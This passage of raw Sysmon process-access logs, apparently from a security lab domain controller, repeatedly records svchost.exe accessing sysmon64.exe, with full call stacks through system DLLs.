dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 